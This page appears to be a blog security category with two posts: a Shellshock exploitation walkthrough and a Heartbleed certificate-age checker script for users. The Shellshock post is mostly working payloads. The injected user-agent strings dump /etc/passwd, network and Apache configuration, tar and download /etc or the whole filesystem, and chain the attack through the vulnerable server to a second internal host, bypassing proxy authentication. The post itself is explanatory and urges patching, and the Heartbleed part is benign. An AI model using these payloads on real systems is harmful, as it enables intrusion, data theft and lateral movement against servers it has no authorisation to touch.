Posts in category security

Fun with cgi-bin and Shellshock

The setup

One of the simple examples of the Shellshock bug uses wget and overrides the user agent. For example:

USER_AGENT="() { : ; }; /bin/touch /tmp/SHELLSHOCKED"
wget -U "$USER_AGENT" http://example.com/cgi-bin/vulnerable.sh

(You can do it all as one line, but we're going to take USER_AGENT to the extreme, and setting it as a variable will make it clearer.)

You can create a simple CGI script that uses bash like this:

#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "<html><title>hello</title><body>world</body></html>"

and put it in your cgi-bin directory as vulnerable.sh and then point the wget command above at it. (I will note for the sake of completeness that I do not recommend doing that on an internet accessible system -- there are active scans for Shellshock running in the wild!)

The malicious wget above will, on systems with touch in /bin, create an empty file in /tmp.

For checking your systems, this is quite handy.

Extend our flexibility

If we make the USER_AGENT a bit more complex:

USER_AGENT="() { : ; }; /bin/bash -c '/bin/touch /tmp/SHELLSHOCKED'"

We now can run an arbitrarily long bash script within the Shellshock payload.

One of the issues people have noticed with Shellshock is that $PATH is not set to everything you may be used to. With our construct, we can fix that.

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; touch /tmp/SHELLSHOCKED'"

We now have any $PATH we want.

Enter CGI again

What can we do with that? There have been a number of examples which using ping to talk to a known server or something along those lines. But can we do something a bit more direct?

Well, we created a CGI script in bash for testing this exploit, so the webserver is expecting CGI output from the underlying script. What if we embed another CGI script into the payload? That looks like

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: text/html\n\"; echo -e \"<html><title>Vulnerable</title><body>Vulnerable</body></html>\"'"

Now wget will get back a valid web-page, but it's a webpage of our own. If we are getting back a valid webpage, maybe we'd like to look at that page using our webbrowser, right? Well, in Firefox it's easy to change our USER_AGENT. To figure out what we should change it to, we run

echo "$USER_AGENT"

and get

() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:$PATH; echo -e "Content-type: text/html\n"; echo -e "<html><title>Vulnerable</title><body>Vulnerable</body></html>"'

We can then cut and paste that into the general.useragent.override preference on the about:config page of Firefox. (To add the preference in the first place, Right-click, New->String, enter general.useragent.override for the name and paste in the USER_AGENT value for the value.) Then we can point Firefox at http://example.com/cgi-bin/vulnerable.sh and get a webpage that announces the system is vulnerable. (I would recommend creating a separate user account for this so you don't inadvertently attempt to exploit Shellshock on every system you browse. I'm sure that when you research your tax questions on irs.gov, they'll be quite understanding of how it all happened.)

What can we do with our new vulnerability webpage? Perhaps something like this:

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: text/html\n\"; echo -e \"<html><title>Vulnerability report \`hostname\`</title><body><h1>Vulnerability report for\`hostname\`; \`date\`</h1><h2>PATH</h2><p>\$PATH</p><h2>IP configuration</h2><pre>\`ifconfig\`</pre><h2>/etc/passwd</h2><pre>\`cat /etc/passwd\`</pre><h2>Apache config</h2><pre>\`grep . /etc/httpd/conf.d/*.conf | sed \"s/</\</g\"\`</pre></body></html>\" 2>&1 | tee -a /tmp/SHELLSHOCKED'"

Let's break that down. The leading () { : ; }; is the key to the exploit. Then we have the payload of /bin/bash -c '...' which allows for an arbitrary script. That script, if formatted sanely, would look something like this

export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:$PATH;
echo -e "Content-type: text/html\n"
echo -e "<html><title>Vulnerability report `hostname`</title>
<body>
    <h1>Vulnerability report for `hostname`; `date`</h1>
    <h2>PATH</h2>
    <p>$PATH</p>
    <h2>IP configuration</h2>
    <pre>`ifconfig -a`</pre>
    <h2>/etc/passwd</h2>
    <pre>`cat /etc/passwd`</pre>
    <h2>Apache config</h2>
    <pre>`grep . /etc/httpd/conf.d/*.conf | sed "s/</\&lt;/g"`</pre>
</body></html>" 2>&1 | tee -a /tmp/SHELLSHOCKED'

That generates a report giving the server's:

  • hostname
  • local time
  • content of /etc/passwd
  • apache configuration files

Not only does it send the report back to us, but also appends a copy to /tmp/SHELLSHOCKED... just for good measure. This can be trivially expanded to run find / to generate a complete list of files that the webserver is allowed to see, or run just about anything else that the webserver has permission to do.

Heavier load

So we've demonstrated that we can send back a webpage. What about a slightly different payload? With this USER_AGENT

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: application/octet-stream\n\"; tar -czf- /etc'"

run slightly differently,

wget -U "$USER_AGENT" -O vulnerable.tar.gz http://example.com/cgi-bin/vulnerable.sh

we have now pulled all the content from /etc that the webserver has permission to read. Anything it does not have permission to read has been skipped. Only patience and bandwidth limits us from changing that to

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: application/octet-stream\n\"; tar -czf- /'"

and thus download everything on the server that the webserver has permission to read.

Boomerang

Arbitrary code execution can be fun. Afterall, why not browse via the webserver? (Assuming the webserver can get out again.)

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: application/octet-stream\n\"; wget -q -O- https://retracile.net'"

Oh, look. We can run wget on the vulnerable server, which means we can use the server to exploit Shellshock on another server. So with this USER_AGENT

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: application/octet-stream\n\"; wget -q -O- -U \"() { : ; }; /bin/bash -c \'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\\\$PATH; echo -e \\\"Content-type: application/octet-stream\\n\\\"; wget -q -O- https://retracile.net\'\" http://other.example.com/cgi-bin/vulnerable.sh'"

we use Shellshock on example.com to use Shellshock on other.example.com to pull a webpage from retracile.net.

Inside access

Some webservers will be locked down to not be able to connect back out to the internet like that, but many services are proxied by Apache. In those cases, Apache has access to the other webserver it is proxying for, whether it is local or on another machine in its network. Authentication may be enforced by Apache before doing the proxying. In such a configuration, being able to run wget on the webserver would allow access to the proxied webserver without going through Apache's authentication.

Conclusions

While the exploration of Shellshock here postulates a vulnerable CGI script, the vulnerability can be exploited even without CGI being involved. That said, if you have any CGI script that executes bash explicitly or even implicitly on any code path, the above attacks apply to you.

If you have any internet-facing systems, you'd better get it patched -- twice. The first patch sent out was incomplete; the original Shellshock is CVE-2014-6271 and the followup is CVE-2014-7169.

Heartbleed for users

There has been a great deal of commotion about The Heartbleed Bug, particularly from the point of view of server operators. Users are being encouraged to change all their passwords, but--oh, wait--not until after the servers get fixed.

How's a poor user to know when that happens?

Well, you can base it on when the site's SSL cert was issued. If it was issued prior to the Heartbleed announcement, the keys have not been changed (but see update) in response to Heartbleed. That could be for a couple of different reasons. One is that the site was not vulnerable because it was never running a vulnerable version of OpenSSL. The other is that the site was vulnerable, and the vulnerability has been patched, but the operators of the site have not replaced their SSL keys yet.

In either of those two cases, changing your password isn't going to do much. If the site was never vulnerable, your account is not affected. If it was vulnerable, an adversary who got the private keys still has them, and changing your password does little for you.

So once a site updates its SSL cert, it then makes sense to change your password.

How do you know when that happens? Well, if you are using Firefox, you can click on the lock icon, click on the 'more information' button, then the Security tab, then the 'View Certificate' button, then look at the 'Issued On' line. Then close out that window and the previous window. ... For each site you want to check.

That got tedious.

cert_age_check.py:

#!/usr/bin/python
import sys
import ssl
import subprocess
import datetime


def check_bleeding(hostname, port):
    """Returns true if you should change your password."""
    cert = ssl.get_server_certificate((hostname, port))
    task = subprocess.Popen(['openssl', 'x509', '-text', '-noout'],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    readable, _ = task.communicate(cert)
    issued = [line for line in readable.splitlines() if 'Not Before' in
        line][0]
    date_string = issued.split(':', 1)[1].strip()
    issue_date = datetime.datetime.strptime(date_string,
        '%b %d %H:%M:%S %Y %Z')
    return issue_date >= datetime.datetime(2014, 4, 8, 0, 0)


def main(argv):
    """Syntax: python cert_age_check.py <hostname> [portnumber]"""
    hostname = argv[1]
    if len(argv) > 2:
        port = int(argv[2])
    else:
        # 993 and 995 matter for email...
        port = 443
    if check_bleeding(hostname, port):
        sys.stdout.write("Change your password\n")
    else:
        sys.stdout.write("Don't bother yet\n")
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))

This script checks the issue date of the site's SSL certificate to see if it has been issued since the Heartbleed announcement and tells you if it is time to change your password. If something goes wrong in that process, the script will fail with a traceback; I'm not attempting to make this particularly robust. (Nor, for that matter, elegant.)

If you save a list of hostnames to a file, you can run through them like this:

xargs -n 1 python cert_age_check.py < account_list

So if you have a file with

bankofamerica.com
flickr.com

you will get

Don't bother yet for bankofamerica.com
Change your password for flickr.com

While I would not suggest handing this to someone uncomfortable with a commandline, it is useful for those of us who support friends and family to quickly be able to determine what accounts to recommend they worry about and which to deal with later.

UPDATE: There is a flaw in this approach: I was surprised to learn that the cert that a CA provides to a website operator may have the same issue date as the original cert -- which makes it impossible for the user to determine if the cert is in fact new. With that wrinkle, if you are replacing your cert due to heartbleed, push your CA to give you a cert with a new issue date as evidence that you have fixed your security.

Something I mentioned elsewhere, but did not explicitly state here, is that even with a newly dated cert, a user still cannot tell if the private key was changed along with the cert. If the cert has not changed, the private key has not either. If the operator changes the cert, they will have changed the private key at that point if they are going to do so.

This gets us back to issues of trust. A security mechanism must have a way to recover from a security failure; that is widely understood. But Heartbleed is demonstrating that a security mechanism must include externally visible evidence of the recovery, or the recovery is not complete.

UPDATE: For this site, I buy my SSL cert through DreamHost. I had to open a help ticket to get them to remove the existing cert from the domain in their management application before I could get a new cert. (If you already have a valid cert, the site will let you click on buttons to buy a new cert, but it won't actually take any action on it. That is a reasonable choice in order to avoid customers buying duplicate certs -- but it would be nice to be able to do so anyway.) The response to my help ticket took longer than I would have liked, but I can understand they're likely swamped, and probably don't have a lot of automation around this since they would reasonably not foresee needing it. Once they did that, I then had to buy a new cert from them. I was happy to see that the new cert I bought is good for more than a year -- it will expire when the next cert I would have needed to buy would have expired. Which means that while I had to pay for a new cert, in the long run it will not cost me anything extra. And the new cert has an updated issue date so users can see that I have updated it.